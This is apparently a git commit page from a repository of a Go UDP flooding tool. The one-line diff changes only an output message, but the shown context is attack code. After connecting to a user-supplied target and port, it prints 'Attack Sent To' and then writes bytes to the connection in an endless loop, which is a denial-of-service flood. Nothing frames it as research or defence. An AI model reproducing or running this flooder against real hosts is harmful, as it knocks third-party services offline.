Okayge
This commit is contained in:
parent
839c241020
commit
a2e09b06db
1 changed files with 1 additions and 1 deletions
|
@ -13,7 +13,7 @@ func main() {
|
||||||
if err != nil {
|
if err != nil {
|
||||||
print(err)
|
print(err)
|
||||||
} else {
|
} else {
|
||||||
fmt.Println("Attack Sent To " + target + " Using Port " + port + " With udphex!")
|
fmt.Println("Attack Sent To " + target + ":" + port)
|
||||||
for {
|
for {
|
||||||
conn.Write([]byte("\x61\x73\x64"))
|
conn.Write([]byte("\x61\x73\x64"))
|
||||||
}
|
}
|
||||||
|
|
Loading…
Add table
Reference in a new issue